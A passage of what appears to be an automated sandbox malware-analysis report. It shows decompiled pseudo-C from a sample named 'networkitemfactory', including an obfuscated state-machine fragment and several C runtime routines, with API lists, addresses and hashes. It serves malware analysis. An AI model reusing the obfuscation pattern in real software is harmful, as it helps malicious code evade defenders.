                                                                                                      									if(__eflags > 0) {
                                                                                                      										__eflags = _t107 - 0x2833dc8d;
                                                                                                      										if(_t107 != 0x2833dc8d) {
                                                                                                      											goto L58;
                                                                                                      										} else {
                                                                                                      											E020B4180(_t177, _v2852);
                                                                                                      											_t107 = 0x14d5ed4a;
                                                                                                      											while(1) {
                                                                                                      												_t241 = _v2892;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(__eflags == 0) {
                                                                                                      											_t119 = E020B18E0( &_v2836,  &_v2816,  &_v2844);
                                                                                                      											_t229 = _v2896;
                                                                                                      											_t281 = _t281 + 4;
                                                                                                      											asm("sbb eax, eax");
                                                                                                      											_t107 = ( ~_t119 & 0x0505783b) + 0x1994374c;
                                                                                                      											while(1) {
                                                                                                      												_t241 = _v2892;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											__eflags = _t107 - 0x1fd2b00b;
                                                                                                      											if(_t107 == 0x1fd2b00b) {
                                                                                                      												E020B4180(_t177, _v2844);
                                                                                                      												_t229 = _v2896;
                                                                                                      												_t107 = 0x1994374c;
                                                                                                      												while(1) {
                                                                                                      													_t241 = _v2892;
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												__eflags = _t107 - 0x202b0a47;
                                                                                                      												if(_t107 != 0x202b0a47) {
                                                                                                      													goto L58;
                                                                                                      												} else {
                                                                                                      													_v2820 = _t229;
                                                                                                      													_v2828 = _t277;
                                                                                                      													_v2824 = _t279;
                                                                                                      													_t123 = E020B1DF0( &_v2828,  &_v2860);
                                                                                                      													_t229 = _v2896;
                                                                                                      													asm("sbb eax, eax");
                                                                                                      													_t107 = ( ~_t123 & 0xe4773bcf) + 0x1eb6b95d;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							goto L69;
                                                                                                      							L58:
                                                                                                      							__eflags = _t107 - 0x198d893d;
                                                                                                      						} while (_t107 != 0x198d893d);
                                                                                                      						return _v2888;
                                                                                                      						goto L69;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}
































































                                                                                                      0x020b12b0
                                                                                                      0x020b12b8
                                                                                                      0x020b12c2
                                                                                                      0x020b12ca
                                                                                                      0x020b12cc
                                                                                                      0x020b12d0
                                                                                                      0x020b12d5
                                                                                                      0x020b12d9
                                                                                                      0x020b12dd
                                                                                                      0x020b12e1
                                                                                                      0x020b12e1
                                                                                                      0x020b12e1
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b12f0
                                                                                                      0x020b12f0
                                                                                                      0x020b12f0
                                                                                                      0x020b12f0
                                                                                                      0x020b12f5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b12fb
                                                                                                      0x020b17bc
                                                                                                      0x020b17c1
                                                                                                      0x020b17c3
                                                                                                      0x020b17d6
                                                                                                      0x020b17db
                                                                                                      0x020b17db
                                                                                                      0x020b17e2
                                                                                                      0x020b17e4
                                                                                                      0x020b17e9
                                                                                                      0x020b17eb
                                                                                                      0x020b17fe
                                                                                                      0x020b1803
                                                                                                      0x020b1803
                                                                                                      0x020b180c
                                                                                                      0x00000000
                                                                                                      0x020b1301
                                                                                                      0x020b1301
                                                                                                      0x020b1306
                                                                                                      0x020b14f3
                                                                                                      0x020b14f8
                                                                                                      0x020b15d1
                                                                                                      0x020b15d6
                                                                                                      0x00000000
                                                                                                      0x020b15dc
                                                                                                      0x020b15e0
                                                                                                      0x020b15ed
                                                                                                      0x020b160d
                                                                                                      0x020b1616
                                                                                                      0x020b161b
                                                                                                      0x020b1622
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b14fe
                                                                                                      0x020b14fe
                                                                                                      0x020b15be
                                                                                                      0x020b15c7
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1504
                                                                                                      0x020b1504
                                                                                                      0x020b1509
                                                                                                      0x020b1532
                                                                                                      0x020b1537
                                                                                                      0x020b153d
                                                                                                      0x020b153f
                                                                                                      0x020b1541
                                                                                                      0x020b1559
                                                                                                      0x020b155b
                                                                                                      0x020b155b
                                                                                                      0x020b1561
                                                                                                      0x020b1567
                                                                                                      0x020b1588
                                                                                                      0x020b158a
                                                                                                      0x020b158f
                                                                                                      0x020b1594
                                                                                                      0x020b159d
                                                                                                      0x020b15a1
                                                                                                      0x020b15a5
                                                                                                      0x020b15a8
                                                                                                      0x020b15ac
                                                                                                      0x020b15b1
                                                                                                      0x00000000
                                                                                                      0x020b150b
                                                                                                      0x020b150b
                                                                                                      0x020b1510
                                                                                                      0x00000000
                                                                                                      0x020b1516
                                                                                                      0x020b151a
                                                                                                      0x020b1523
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1510
                                                                                                      0x020b1509
                                                                                                      0x020b14fe
                                                                                                      0x020b130c
                                                                                                      0x020b130c
                                                                                                      0x020b14b1
                                                                                                      0x020b14ba
                                                                                                      0x020b14bc
                                                                                                      0x020b14c0
                                                                                                      0x020b14c2
                                                                                                      0x020b180e
                                                                                                      0x020b181c
                                                                                                      0x020b14c8
                                                                                                      0x020b14cd
                                                                                                      0x020b14ce
                                                                                                      0x020b14d4
                                                                                                      0x020b14d6
                                                                                                      0x020b14d9
                                                                                                      0x020b14dd
                                                                                                      0x020b14df
                                                                                                      0x020b17a8
                                                                                                      0x020b17bb
                                                                                                      0x020b14e5
                                                                                                      0x020b14e9
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b14df
                                                                                                      0x020b1312
                                                                                                      0x020b1312
                                                                                                      0x020b1317
                                                                                                      0x020b1425
                                                                                                      0x020b142a
                                                                                                      0x00000000
                                                                                                      0x020b1430
                                                                                                      0x020b143a
                                                                                                      0x020b143c
                                                                                                      0x020b1441
                                                                                                      0x020b1443
                                                                                                      0x020b1456
                                                                                                      0x020b145b
                                                                                                      0x020b145b
                                                                                                      0x020b1483
                                                                                                      0x020b1485
                                                                                                      0x020b148a
                                                                                                      0x020b1493
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b131d
                                                                                                      0x020b131d
                                                                                                      0x020b13d0
                                                                                                      0x020b13d8
                                                                                                      0x020b13da
                                                                                                      0x020b13dc
                                                                                                      0x020b13de
                                                                                                      0x020b13e8
                                                                                                      0x020b13f1
                                                                                                      0x020b13f2
                                                                                                      0x020b13f9
                                                                                                      0x020b13fc
                                                                                                      0x020b13fe
                                                                                                      0x020b1402
                                                                                                      0x020b1406
                                                                                                      0x020b140a
                                                                                                      0x020b140a
                                                                                                      0x020b140f
                                                                                                      0x020b140f
                                                                                                      0x020b1417
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1323
                                                                                                      0x020b1328
                                                                                                      0x020b13ae
                                                                                                      0x020b13b9
                                                                                                      0x020b13c0
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b132a
                                                                                                      0x020b132f
                                                                                                      0x00000000
                                                                                                      0x020b1335
                                                                                                      0x020b1339
                                                                                                      0x020b1351
                                                                                                      0x020b1352
                                                                                                      0x020b1360
                                                                                                      0x020b136d
                                                                                                      0x020b1373
                                                                                                      0x020b1378
                                                                                                      0x020b137b
                                                                                                      0x020b137e
                                                                                                      0x020b1381
                                                                                                      0x020b1384
                                                                                                      0x020b1384
                                                                                                      0x020b1387
                                                                                                      0x020b138f
                                                                                                      0x020b138f
                                                                                                      0x020b1395
                                                                                                      0x020b1398
                                                                                                      0x020b139d
                                                                                                      0x00000000
                                                                                                      0x020b139d
                                                                                                      0x020b132f
                                                                                                      0x020b1328
                                                                                                      0x020b131d
                                                                                                      0x020b1317
                                                                                                      0x020b130c
                                                                                                      0x020b1306
                                                                                                      0x00000000
                                                                                                      0x020b12fb
                                                                                                      0x020b162c
                                                                                                      0x020b1631
                                                                                                      0x020b1704
                                                                                                      0x020b1709
                                                                                                      0x020b178a
                                                                                                      0x020b1795
                                                                                                      0x020b179c
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b170b
                                                                                                      0x020b170b
                                                                                                      0x020b1710
                                                                                                      0x020b176f
                                                                                                      0x020b1778
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1712
                                                                                                      0x020b1712
                                                                                                      0x020b1717
                                                                                                      0x00000000
                                                                                                      0x020b1719
                                                                                                      0x020b1719
                                                                                                      0x020b171e
                                                                                                      0x020b1720
                                                                                                      0x020b1733
                                                                                                      0x020b1738
                                                                                                      0x020b1738
                                                                                                      0x020b1743
                                                                                                      0x020b1747
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1717
                                                                                                      0x020b1710
                                                                                                      0x020b1637
                                                                                                      0x020b1637
                                                                                                      0x020b16f1
                                                                                                      0x020b16fa
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b163d
                                                                                                      0x020b163d
                                                                                                      0x020b1642
                                                                                                      0x020b16cf
                                                                                                      0x020b16d4
                                                                                                      0x00000000
                                                                                                      0x020b16d6
                                                                                                      0x020b16da
                                                                                                      0x020b16e3
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1648
                                                                                                      0x020b1648
                                                                                                      0x020b16b0
                                                                                                      0x020b16b5
                                                                                                      0x020b16b9
                                                                                                      0x020b16be
                                                                                                      0x020b16c5
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b164a
                                                                                                      0x020b164a
                                                                                                      0x020b164f
                                                                                                      0x020b1690
                                                                                                      0x020b1695
                                                                                                      0x020b1699
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1651
                                                                                                      0x020b1651
                                                                                                      0x020b1656
                                                                                                      0x00000000
                                                                                                      0x020b165c
                                                                                                      0x020b165c
                                                                                                      0x020b1668
                                                                                                      0x020b166c
                                                                                                      0x020b1670
                                                                                                      0x020b1675
                                                                                                      0x020b167b
                                                                                                      0x020b1682
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1656
                                                                                                      0x020b164f
                                                                                                      0x020b1648
                                                                                                      0x020b1642
                                                                                                      0x020b1637
                                                                                                      0x00000000
                                                                                                      0x020b1751
                                                                                                      0x020b1751
                                                                                                      0x020b1751
                                                                                                      0x020b176a
                                                                                                      0x00000000
                                                                                                      0x020b176a
                                                                                                      0x020b12e8

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: /T1$G+ $G+
                                                                                                      • API String ID: 3988819677-2345689787
                                                                                                      • Opcode ID: 7457a2de186d4c4e0c8e4528e9f944a33bd4f7eb74e8acd5551305681c996801
                                                                                                      • Instruction ID: 4e791b6d304ca05a1d9f7a0d9a26517fd9083ac88184ebd205f0006823c530ac
                                                                                                      • Opcode Fuzzy Hash: 7457a2de186d4c4e0c8e4528e9f944a33bd4f7eb74e8acd5551305681c996801
                                                                                                      • Instruction Fuzzy Hash: 3AD19075A083068BC736DF64C4A0AEEF7E6AF84304F544A1EE899D7340DB34E915DB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0040F24B() {
                                                                                                      				intOrPtr _t3;
                                                                                                      				intOrPtr _t4;
                                                                                                      				void* _t6;
                                                                                                      				intOrPtr _t9;
                                                                                                      				void* _t12;
                                                                                                      				intOrPtr _t13;
                                                                                                      
                                                                                                      				_t3 =  *0x438b20; // 0x200
                                                                                                      				_t13 = 0x14;
                                                                                                      				if(_t3 != 0) {
                                                                                                      					if(_t3 < _t13) {
                                                                                                      						_t3 = _t13;
                                                                                                      						goto L4;
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					_t3 = 0x200;
                                                                                                      					L4:
                                                                                                      					 *0x438b20 = _t3;
                                                                                                      				}
                                                                                                      				_t4 = E0040CFF1(_t3, 4);
                                                                                                      				 *0x438b1c = _t4;
                                                                                                      				if(_t4 != 0) {
                                                                                                      					L8:
                                                                                                      					_t12 = 0;
                                                                                                      					_t9 = 0x435ae0;
                                                                                                      					while(1) {
                                                                                                      						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                                                                                      						_t9 = _t9 + 0x20;
                                                                                                      						_t12 = _t12 + 4;
                                                                                                      						if(_t9 >= 0x435d60) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						_t4 =  *0x438b1c; // 0x537710
                                                                                                      					}
                                                                                                      					return 0;
                                                                                                      				} else {
                                                                                                      					 *0x438b20 = _t13;
                                                                                                      					_t4 = E0040CFF1(_t13, 4);
                                                                                                      					 *0x438b1c = _t4;
                                                                                                      					if(_t4 != 0) {
                                                                                                      						goto L8;
                                                                                                      					} else {
                                                                                                      						_t6 = 0x1a;
                                                                                                      						return _t6;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}









                                                                                                      0x0040f24b
                                                                                                      0x0040f253
                                                                                                      0x0040f256
                                                                                                      0x0040f261
                                                                                                      0x0040f263
                                                                                                      0x00000000
                                                                                                      0x0040f263
                                                                                                      0x0040f258
                                                                                                      0x0040f258
                                                                                                      0x0040f265
                                                                                                      0x0040f265
                                                                                                      0x0040f265
                                                                                                      0x0040f26d
                                                                                                      0x0040f272
                                                                                                      0x0040f27b
                                                                                                      0x0040f29b
                                                                                                      0x0040f29b
                                                                                                      0x0040f29d
                                                                                                      0x0040f2a2
                                                                                                      0x0040f2a2
                                                                                                      0x0040f2a5
                                                                                                      0x0040f2a8
                                                                                                      0x0040f2b1
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040f2b3
                                                                                                      0x0040f2b3
                                                                                                      0x0040f2bd
                                                                                                      0x0040f27d
                                                                                                      0x0040f280
                                                                                                      0x0040f286
                                                                                                      0x0040f28b
                                                                                                      0x0040f294
                                                                                                      0x00000000
                                                                                                      0x0040f296
                                                                                                      0x0040f298
                                                                                                      0x0040f29a
                                                                                                      0x0040f29a
                                                                                                      0x0040f294

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __calloc_crt
                                                                                                      • String ID: `]C$wC
                                                                                                      • API String ID: 3494438863-808437571
                                                                                                      • Opcode ID: 484377b076df00fabd8c2a1fccc8f7f648e9a1d09ed7ea333a479461580e79bd
                                                                                                      • Instruction ID: 72d7284f8e9fd5ec6db6b3b88fa14804601b3eb64e61d0091f2518a1533ae0a5
                                                                                                      • Opcode Fuzzy Hash: 484377b076df00fabd8c2a1fccc8f7f648e9a1d09ed7ea333a479461580e79bd
                                                                                                      • Instruction Fuzzy Hash: 65F02DB53087038AF7349B59BC61A52A395E748720F00807FF100EA6C0D73C9843878C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 89%
                                                                                                      			E00402524(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                      				char* _v16;
                                                                                                      				char _v28;
                                                                                                      				signed char _v32;
                                                                                                      				void* _t10;
                                                                                                      				void* _t19;
                                                                                                      				intOrPtr* _t22;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				intOrPtr* _t27;
                                                                                                      
                                                                                                      				_t25 = __edi;
                                                                                                      				_t19 = __ebx;
                                                                                                      				while(1) {
                                                                                                      					_t10 = E004025D7(_t19, _t24, _t25, _a4);
                                                                                                      					if(_t10 != 0) {
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					if(E004036E7(_t10, _a4) == 0) {
                                                                                                      						_push(1);
                                                                                                      						_v16 = "bad allocation";
                                                                                                      						_t22 =  &_v28;
                                                                                                      						E004034F3(_t22,  &_v16);
                                                                                                      						_v28 = 0x42cdd4;
                                                                                                      						E0040371A( &_v28, 0x4341d8);
                                                                                                      						asm("int3");
                                                                                                      						_t27 = _t22;
                                                                                                      						 *_t27 = 0x42cdd4;
                                                                                                      						E00403563(_t22);
                                                                                                      						if((_v32 & 0x00000001) != 0) {
                                                                                                      							E004023FA(_t27);
                                                                                                      						}
                                                                                                      						return _t27;
                                                                                                      					} else {
                                                                                                      						continue;
                                                                                                      					}
                                                                                                      					L7:
                                                                                                      				}
                                                                                                      				return _t10;
                                                                                                      				goto L7;
                                                                                                      			}












                                                                                                      0x00402524
                                                                                                      0x00402524
                                                                                                      0x00402539
                                                                                                      0x0040253c
                                                                                                      0x00402544
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00402537
                                                                                                      0x0040254a
                                                                                                      0x0040254f
                                                                                                      0x00402557
                                                                                                      0x0040255a
                                                                                                      0x00402567
                                                                                                      0x0040256f
                                                                                                      0x00402574
                                                                                                      0x00402579
                                                                                                      0x0040257b
                                                                                                      0x00402581
                                                                                                      0x0040258a
                                                                                                      0x0040258d
                                                                                                      0x00402592
                                                                                                      0x00402597
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00402537
                                                                                                      0x00402549
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 0040253C
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00520000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • std::exception::exception.LIBCMT ref: 0040255A
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040256F
                                                                                                        • Part of subcall function 0040371A: RaiseException.KERNEL32(?,?,?,004341D8,?,00000000,?,?,?,00402574,?,004341D8,?,00000001), ref: 0040376F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 3074076210-2104205924
                                                                                                      • Opcode ID: a3d21fe86276208f817dbcb78276c6e3ae1468de7613c1dcd0239201df3327a7
                                                                                                      • Instruction ID: 5cc741f056d4a3ad692e710aafeaad04cb18d0bca015c19945315737f035ef5c
                                                                                                      • Opcode Fuzzy Hash: a3d21fe86276208f817dbcb78276c6e3ae1468de7613c1dcd0239201df3327a7
                                                                                                      • Instruction Fuzzy Hash: ABF0F47150021976CB00AE69ED199EEBFACAF01315F10447BFC04B26D1DFF99B40929C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 020921F9
                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 0209223B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorHugeLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3239643929-0
                                                                                                      • Opcode ID: 0af611ed08318c0b9b5ce45e2fc3fa9cbb846e1ca43603425298a77affc102d6
                                                                                                      • Instruction ID: 9b75fb3b57115c9681c686e7c4d8f0e922515bc931373b92c50d05bb4b59e67f
                                                                                                      • Opcode Fuzzy Hash: 0af611ed08318c0b9b5ce45e2fc3fa9cbb846e1ca43603425298a77affc102d6
                                                                                                      • Instruction Fuzzy Hash: F781B974A00209EFDB04DF94C994BAEB7B1FF88314F148198E94AAB351C734EA91DF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E004154D3(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                      				char _v8;
                                                                                                      				intOrPtr _v12;
                                                                                                      				int _v20;
                                                                                                      				int _t35;
                                                                                                      				int _t38;
                                                                                                      				int _t42;
                                                                                                      				intOrPtr* _t44;
                                                                                                      				int _t47;
                                                                                                      				short* _t49;
                                                                                                      				intOrPtr _t50;
                                                                                                      				intOrPtr _t54;
                                                                                                      				int _t55;
                                                                                                      				int _t59;
                                                                                                      				char* _t62;
                                                                                                      
                                                                                                      				_t62 = _a8;
                                                                                                      				if(_t62 == 0) {
                                                                                                      					L5:
                                                                                                      					return 0;
                                                                                                      				}
                                                                                                      				_t50 = _a12;
                                                                                                      				if(_t50 == 0) {
                                                                                                      					goto L5;
                                                                                                      				}
                                                                                                      				if( *_t62 != 0) {
                                                                                                      					E0040D9B1( &_v20, _a16);
                                                                                                      					_t35 = _v20;
                                                                                                      					__eflags =  *(_t35 + 0xa8);
                                                                                                      					if( *(_t35 + 0xa8) != 0) {
                                                                                                      						_t38 = E004150F5( *_t62 & 0x000000ff,  &_v20);
                                                                                                      						__eflags = _t38;
                                                                                                      						if(_t38 == 0) {
                                                                                                      							__eflags = _a4;
                                                                                                      							_t59 = 1;
                                                                                                      							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                      							__eflags = _t42;
                                                                                                      							if(_t42 != 0) {
                                                                                                      								L21:
                                                                                                      								__eflags = _v8;
                                                                                                      								if(_v8 != 0) {
                                                                                                      									_t54 = _v12;
                                                                                                      									_t31 = _t54 + 0x70;
                                                                                                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                      									__eflags =  *_t31;
                                                                                                      								}
                                                                                                      								return _t59;
                                                                                                      							}
                                                                                                      							L20:
                                                                                                      							_t44 = E00403FAC();
                                                                                                      							_t59 = _t59 | 0xffffffff;
                                                                                                      							__eflags = _t59;
                                                                                                      							 *_t44 = 0x2a;
                                                                                                      							goto L21;
                                                                                                      						}
                                                                                                      						_t59 = _v20;
                                                                                                      						__eflags =  *(_t59 + 0x74) - 1;
                                                                                                      						if( *(_t59 + 0x74) <= 1) {
                                                                                                      							L15:
                                                                                                      							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                      							L16:
                                                                                                      							if(__eflags < 0) {
                                                                                                      								goto L20;
                                                                                                      							}
                                                                                                      							__eflags = _t62[1];
                                                                                                      							if(_t62[1] == 0) {
                                                                                                      								goto L20;
                                                                                                      							}
                                                                                                      							L18:
                                                                                                      							_t59 =  *(_t59 + 0x74);
                                                                                                      							goto L21;
                                                                                                      						}
                                                                                                      						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                      						if(__eflags < 0) {
                                                                                                      							goto L16;
                                                                                                      						}
                                                                                                      						__eflags = _a4;
                                                                                                      						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                                      						_t59 = _v20;
                                                                                                      						__eflags = _t47;
                                                                                                      						if(_t47 != 0) {
                                                                                                      							goto L18;
                                                                                                      						}
                                                                                                      						goto L15;
                                                                                                      					}
                                                                                                      					_t55 = _a4;
                                                                                                      					__eflags = _t55;
                                                                                                      					if(_t55 != 0) {
                                                                                                      						 *_t55 =  *_t62 & 0x000000ff;
                                                                                                      					}
                                                                                                      					_t59 = 1;
                                                                                                      					goto L21;
                                                                                                      				}
                                                                                                      				_t49 = _a4;
                                                                                                      				if(_t49 != 0) {
                                                                                                      					 *_t49 = 0;
                                                                                                      				}
                                                                                                      				goto L5;
                                                                                                      			}

















                                                                                                      0x004154db
                                                                                                      0x004154e0
                                                                                                      0x004154fa
                                                                                                      0x00000000
                                                                                                      0x004154fa
                                                                                                      0x004154e2
                                                                                                      0x004154e7
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004154ec
                                                                                                      0x00415509
                                                                                                      0x0041550e
                                                                                                      0x00415511
                                                                                                      0x00415518
                                                                                                      0x00415537
                                                                                                      0x0041553e
                                                                                                      0x00415540
                                                                                                      0x00415584
                                                                                                      0x00415593
                                                                                                      0x0041559b
                                                                                                      0x004155a1
                                                                                                      0x004155a3
                                                                                                      0x004155b3
                                                                                                      0x004155b3
                                                                                                      0x004155b7
                                                                                                      0x004155b9
                                                                                                      0x004155bc
                                                                                                      0x004155bc
                                                                                                      0x004155bc
                                                                                                      0x004155bc
                                                                                                      0x00000000
                                                                                                      0x004155c2
                                                                                                      0x004155a5
                                                                                                      0x004155a5
                                                                                                      0x004155aa
                                                                                                      0x004155aa
                                                                                                      0x004155ad
                                                                                                      0x00000000
                                                                                                      0x004155ad
                                                                                                      0x00415542
                                                                                                      0x00415545
                                                                                                      0x00415549
                                                                                                      0x00415572
                                                                                                      0x00415572
                                                                                                      0x00415575
                                                                                                      0x00415575
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00415577
                                                                                                      0x0041557b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041557d
                                                                                                      0x0041557d
                                                                                                      0x00000000
                                                                                                      0x0041557d
                                                                                                      0x0041554b
                                                                                                      0x0041554e
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00415552
                                                                                                      0x00415565
                                                                                                      0x0041556b
                                                                                                      0x0041556e
                                                                                                      0x00415570
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00415570
                                                                                                      0x0041551a
                                                                                                      0x0041551d
                                                                                                      0x0041551f
                                                                                                      0x00415524
                                                                                                      0x00415524
                                                                                                      0x00415529
                                                                                                      0x00000000
                                                                                                      0x00415529
                                                                                                      0x004154ee
                                                                                                      0x004154f3
                                                                                                      0x004154f7
                                                                                                      0x004154f7
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415509
                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415537
                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 00415565
                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0041559B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
